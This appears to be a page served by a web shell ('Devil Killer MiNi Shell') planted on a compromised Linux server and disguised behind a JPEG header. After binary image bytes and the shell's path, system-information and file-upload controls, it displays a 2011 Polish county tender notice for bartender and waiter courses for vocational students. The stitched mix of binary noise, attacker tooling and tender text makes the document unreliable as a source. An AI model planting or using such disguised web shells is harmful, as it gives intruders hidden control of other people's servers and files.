JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/140473-N-2011.html

<p class="kh_header"><b>Wadowice: Organizacja i przeprowadzenie kursów barmana, barmaństwa klasycznego i kelnera uczniów Zespołu Szkół RCKU w Radoczy, uczniów Zespołu Szkół nr3 w Wadowicach i uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego wg 3-ch zadań</b><br>
<b>Numer ogłoszenia: 140473 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wadowicki , ul. Batorego 2, 34-100 Wadowice, woj. małopolskie, tel. 033 8734200, faks 033 8232433.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.wadowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów barmana, barmaństwa klasycznego i kelnera uczniów Zespołu Szkół RCKU w Radoczy, uczniów Zespołu Szkół nr3 w Wadowicach i uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego wg 3-ch zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: Zorganizowanie i przeprowadzenie kursów młodzieży szkolnej Zespołu Szkół RCKU w Radoczy, uczniów Zespołu Szkół nr 3 w Wadowicach i uczniów Zespołu Szkół nr 2 w Andrychowie o specjalności: barman, barmaństwo klasyczne i kelner ramach projektu Modernizacja kształcenia zawodowego w Małopolsce wg 3-ch zadań.
Zadanie 1. Organizacja i przeprowadzenie kursu barmana dla uczniów Zespołu Szkół RCKU w Radoczy i dla  uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Zadanie 2 Organizacja i przeprowadzenie kursu barmaństwa klasycznego dla uczniów Zespołu Szkół nr 3 w Wadowicach w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Zadanie 3 Organizacja i przeprowadzenie kursu kelnera dla uczniów Zespołu Szkół RCKU w Radoczy, w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.
Celem kursów jest podniesienie wiedzy i umiejętności uczniów w zakresie obsługi konsumenta, a także zdolności uczniów do samo zatrudnienia i zwiększenia szans na rynku pracy. 
Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:
Zadanie 1. Organizacja i przeprowadzenie kursu barmana dla uczniów Zespołu Szkół RCKU w Radoczy i dla  uczniów Zespołu Szkół nr 2 w Andrychowie w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Miejsce przeprowadzenia kursu:  Zespół Szkół nr  2 w Andrychowie, ul. Batorego 9 oraz Zespół Szkół RCKU w Radoczy, Radocza 14. Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół nr 2 w Andrychowie oraz w Zespole Szkół RCKU w Radoczy. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu barmana winna posiadać Certyfikat ukończenia kursu od Polskiego Stowarzyszenia Barmanów w stopniu najwyższym - etapowo oraz udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń barmańskich.
Planowana ilość osób: 
I grupa: uczniowie z Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Radoczy - 10 osób,
II grupa: uczniowie z Zespołu  Szkół nr  2 w Andrychowie - 25 osób (z podziałem na Grupę A - 10 osób i Grupę B - 15 osób).
Termin przeprowadzenia kursu: 
dla grupy I -  do 22 czerwca 2011 roku (ZS RCKU Radocza),
dla grupy II  - Grupa A - 10 osób do 22 czerwca 2011 roku (ZS 2 A-chów),
                 - Grupa B - 15 osób - realizacja kursu w okresie od 1 do 30 września 2011 roku (ZS 2 A-chów).
Kurs powinien obejmować łącznie 40 godzin dla każdej z grup (3) w tym 30 godzin nauki praktycznej i 10 godzin nauki teoretycznej. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5-minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (shakery, miarki barmańskie, łyżki barmańskie do stirowania, szczypce o różnej wielkości, zestaw szkła barowego różnych wzorów do podawania napojów alkoholowych, bezalkoholowych i mieszanych, trybuszon, kubki barmańskie, blender elektryczny, młynek do rozdrabniania lodu, dwa komplety zestawów noży dekoracyjnych, dzbanki o różnej wielkości do kawy, soków i wody, cooler, mudler, ekspres ciśnieniowy do kawy, surowce i niezbędne produkty np. soki owocowe, wody gazowane i niegazowane, owoce do dekoracji itp., ozdoby papierowe i plastikowe do drinków i napojów np. parasolki) oraz materiały dydaktyczne do prawidłowej realizacji programu kursu dla każdego uczestnika. 
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego 
i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć:
1)	Wprowadzenie i terminologia
- barman jako zawód - charakterystyka pracy barmana (organizacja pracy w barze, predyspozycje do wykonywania zawodu), 
- barmańskie savoir-vivre - praca z klientem i z współpracownikami lokalu,
2)  Bar jako miejsce pracy - wyposażenie baru i prezentacja przyrządów barmana
- podział na typy barów, 
- umeblowanie i wyposażenie baru w sprzęt i produkty, aranżacja, 
3) Towaroznawstwo napojów alkoholowych, bezalkoholowych i mieszanych
- podział alkoholi n podstawowe grupy: piwo, wino, wódki białe i gatunkowe, brandy, koniaki, likiery, whisky, wermuty i miody pitne,
- aperitif, digestif, 
- wpływ alkoholu na organizm człowieka
4) Podstawy miksologii
- charakterystyka napojów (cocktaile, rodzaje drinków: long, short i inne), 
- techniki miksowania i mieszania napojów, 
- zastosowanie receptur, 
- dobór zastawy stołowej (szkło barowe, miarki) i elementów dekoracyjnych,
- zasady sporządzania i podawania napojów, 
- kultura spożywania napojów alkoholowych, bezalkoholowych i mieszanych, 
5) Nauka sporządzania wybranych drinków
6) Kawa w barze - nauka sporządzania drinków na bazie kawy
- ekspres do kawy ciśnieniowy,
- zasady parzenia i serwowania kawy,
- drinki na bazie kawy, 
- nauka sporządzania wybranych drinków na bazie kawy.
7) Free style
- czym jest free style, 
- zasady i techniki free style, 
- pokazy
8) Egzamin
Zadanie 2 Organizacja i przeprowadzenie kursu barmaństwa klasycznego dla uczniów Zespołu Szkół nr 3 w Wadowicach w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce,
Miejsce przeprowadzenia kursu:  Zespół Szkół nr 3 w Wadowicach, ul. Wojska Polskiego 13 
Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół nr 3 w Wadowicach. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu barmaństwa klasycznego winna posiadać Certyfikat ukończenia kursu od Polskiego Stowarzyszenia Barmanów w stopniu najwyższym - etapowo oraz udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń barmańskich.
Planowana ilość osób: 
Uczniowie z Zespołu Szkół nr 3 w Wadowicach - 15 osób,
Termin przeprowadzenia kursu: do 22 czerwca 2011 roku
Program powinien obejmować 40 godzin zajęć, w tym zajęć praktycznych 30 godzin i 10 godzin nauki teoretycznej. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5 minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (shakery, miarki barmańskie, łyżki barmańskie do stirowania, szczypce o różnej wielkości, zestaw szkła barowego różnych wzorów do podawania napojów alkoholowych, bezalkoholowych i mieszanych, trybuszon, kubki barmańskie, blender elektryczny, młynek do rozdrabniania lodu, dwa komplety zestawów noży dekoracyjnych, dzbanki o różnej wielkości do kawy, soków i wody, cooler, mudler, ekspres ciśnieniowy do kawy, surowce i niezbędne produkty np. soki owocowe, wody gazowane i niegazowane, owoce do dekoracji itp., ozdoby papierowe i plastikowe do drinków i napojów np. parasolki) oraz materiały dydaktyczne do prawidłowej realizacji programu kursu dla każdego uczestnika.
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający):
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć:
 1.	Wprowadzenie i terminologia 
- barman jako zawód, 
- barmańskie savoir-vivre,
- praca z klientem, 
- barman szefem lokalu,
 2.	Bar jako miejsce pracy. Alkohol jako używka albo atrybut kultury 
- podział na typy barów, 
- umeblowanie i wyposażenie, aranżacja, 
- wyposażenie podręczne, 
- podział alkoholi, 
- aperitif, digestif, 
- wpływ alkoholu na organizm człowieka,
 3.	Podstawy miksologii:
-  cocktaile, rodzaje drinków, drinki światowe i lokalne, 
- dodatki i składniki dekoracyjne, 
- szkło barowe, miary, 
- dodatki uzupełniające,
 4.	Nauka sporządzania wybranych drinków
 5.	Kawa w barze
- nauka sporządzania drinków na bazie kawy
- ekspres ciśnieniowy do kawy, 
- zasady parzenia i serwowania kawy, 
- drink na bazie kawy, 
- nauka sporządzania wybranych drinków,
 6.	Free style
- czym jest free style, 
- zasady i techniki free style, 
- pokazy
 7.	Egzamin.
Zadanie 3 Organizacja i przeprowadzenie kursu kelnera dla uczniów Zespołu Szkół RCKU w Radoczy, w ramach projektu Modernizacja kształcenia zawodowego w Małopolsce.
Miejsce przeprowadzenia kursu: Zespół Szkół RCKU w Radoczy, Radocza 14. 
Zamawiający udostępni Wykonawcy pomieszczenia do przeprowadzenia kursu w Zespole Szkół RCKU w Radoczy. 
Wykonawca nie ponosi kosztów wynajęcia sali.
Wykonawca lub osoba zatrudniona do realizacji kursu kelnera winna posiadać udokumentowane minimum 3-letnie doświadczenie w prowadzeniu szkoleń kelnerskich.
Planowana ilość osób: uczniowie z Zespołu Szkół Rolnicze Centrum Kształcenia Ustawicznego w Radoczy - 10 osób.
Termin przeprowadzenia kursu:   do 22 czerwca 2011 roku,
Program powinien obejmować 32 godziny zajęć. Godzina zajęć odpowiada 45 minutom. W trakcie przeprowadzania kursu przewidziane są 2 przerwy po pół godziny. Ponadto Wykonawca po uzgodnieniu z uczestnikami kursu może zorganizować po każdych przeprowadzonych 45 minutach zajęć projektowych 5 minutową  przerwę. Zajęcia mogą odbywać się codziennie w godzinach popołudniowych po zakończeniu zajęć szkolnych oraz w soboty od 9.00 do 16.00 po wcześniejszym ustaleniu terminu z liderem projektu w szkole. Wykonawca przedłoży szczegółowy program zajęć ze wskazaniem ilości godzin zajęć na poszczególną tematykę.
Wykonawca zobowiązany jest do zapewnienia warunków zgodnych z przepisami BHP w trakcie trwania kursu. Wykonawca zapewni odpowiedni sprzęt (karty dań,  tace i tacki, bielizna stołowa (obrusy i serwety), serwetki materiałowe (do nauki składania serwetek), komplet zastawy stołowej, komplet szkła (kieliszki do wina białego, do wina czerwonego, do wody, do wódki, literatki), komplet sztućców, sprzęt do flambirowania oraz materiały dydaktyczne,  surowce i niezbędne produkty do prawidłowej realizacji programu kursu dla każdego uczestnika.
Po zakończeniu kursu Wykonawca wyda uczestnikom kursu zaświadczenie Ministerstwa Edukacji Narodowej (MEN) i certyfikat w języku polskim i angielskim. W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny zaświadczenie MEN i certyfikat w języku polskim i angielskim winno być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający).
Dokumenty jakie winien przedłożyć Wykonawca po zakończeniu kursu:
W związku z realizacją kursu w ramach projektu współfinansowanego przez Europejski Fundusz Społeczny dokumenty winny być opatrzone logo Programu Operacyjnego Kapitał Ludzki (POKL), Unii Europejskiej Europejski Fundusz Społeczny (UE EFS), Województwa Małopolskiego i Powiatu Wadowickiego i Modernizacji kształcenia zawodowego w Małopolsce (MKZ) - (wzór logo POKL, UF EFS, województwa i powiatu przekaże zamawiający):
a) listę obecności uczestników kursu (z każdego dnia zajęć) na zajęciach teoretycznych i praktycznych, 
b) dziennik zajęć,
c) potwierdzenie odbioru materiałów dydaktycznych przez uczestników kursu,
d) protokół z egzaminu wewnętrznego z wynikami egzaminu,
e) karta egzaminacyjna,
f) kserokopie  certyfikatów w języku polskim i angielskim,
g) potwierdzenie odbioru certyfikatów w języku polskim i angielskim, 
h) imienny wykaz osób, które ukończyły i które nie ukończyły kurs.
Tematyka zajęć (32 godziny)
1)	Sylwetka kelnera 
-	ubiór i wizerunek zewnętrzny kelnera i kelnerki
-	podstawowe służbowe wyposażenie kelnera (zaplecze kelnerskie, pomocnik kelnerski), 
-	ćwiczenia w noszeniu tac i tacek, 
-	ćwiczenia z zakresu serwowania dań i napojów, 
2)	Wyposażenie sali konsumenckiej 
- bielizna stołowa,
- zastawa stołowa, 
- zasady nakrywania stołów (sposoby składania i rozkładania obrusów, zmiana obrusów w obecności konsumenta), 
- dekoracje stołów w zależności od rodzaju imprezy, 
- sztuka układania serwetek (sposoby układania serwetek - na leżąco i stojąco w zależności od rodzaju serwowanych dań), 
- sztuka układania sztucców i nakrywania stołów(zachowanie odpowiedniej kolejności przy nakrywaniu), 
- technika noszenia zastawy stołowej i szkła oraz tac,
3) Zasady obsługi konsumentów
- powitanie konsumenta,
- serwis, 
- podziękowanie i pożegnanie, 
- podawanie rachunku,
- metody serwowania, 
- kolejność podawania potraw i napojów, 
- prezentacja i podawanie napojów alkoholowych, 
- zasady zbierania zastawy stołowej po konsumpcji, 
- zasady przygotowywania deserów w obecności konsumenta - flambirowanie 
4) Imprezy okolicznościowe
- zasady przygotowywania imprez okolicznościowych - bankietów siedzących i stojących, 
- obsługa imprez okolicznościowych
5) Przeprowadzenie końcowego egzaminu wewnętrznego z zakresu stanowiącego przedmiot kursu. 
Wartość zamówienia jest mniejsza niż kwoty , od których jest uzależniony obowiązek przekazywania ogłoszeń UOPWE.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać wiedzę i doświadczenie, dlatego też musi wykazać w formie załączonego do oferty oświadczenia i wykazu usług, potwierdzonego referencjami lub odpowiednimi dokumentami uprzednich odbiorców usług, że w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert wykonał, co najmniej jedną usługę polegająca na przeprowadzeniu kursu dla co najmniej 10 osób z danej dziedziny. (Wykonawca musi też wykazać, że wyżej wymienione usługi wykonał należycie i skutecznie, z podaniem ich wartości, przedmiotu, zakresu, dat i miejsc wykonania, oraz (fakultatywnie) nazwy, adresu i telefonu odbiorców.
Ocena spełnienia powyższych warunków będzie dokonywana metodą: spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia (zadania) tj. posiadającymi odpowiednie kwalifikacje: dla zadania nr 1 i 2 - Certyfikat ukończenia kursu od Polskiego Stowarzyszenia Barmanów w stopniu najwyższym - etapowo; dla zadania 1, 2 i 3 co najmniej trzy letnie doświadczenie w prowadzeniu kursów (odpowiadających swoją tematyką przedmiotowi zamówienia) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz oświadczeniem, iż posiadają one wymagane uprawnienia.
Ocena spełnienia powyższych warunków będzie dokonywana metodą: spełnia lub nie spełnia, w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

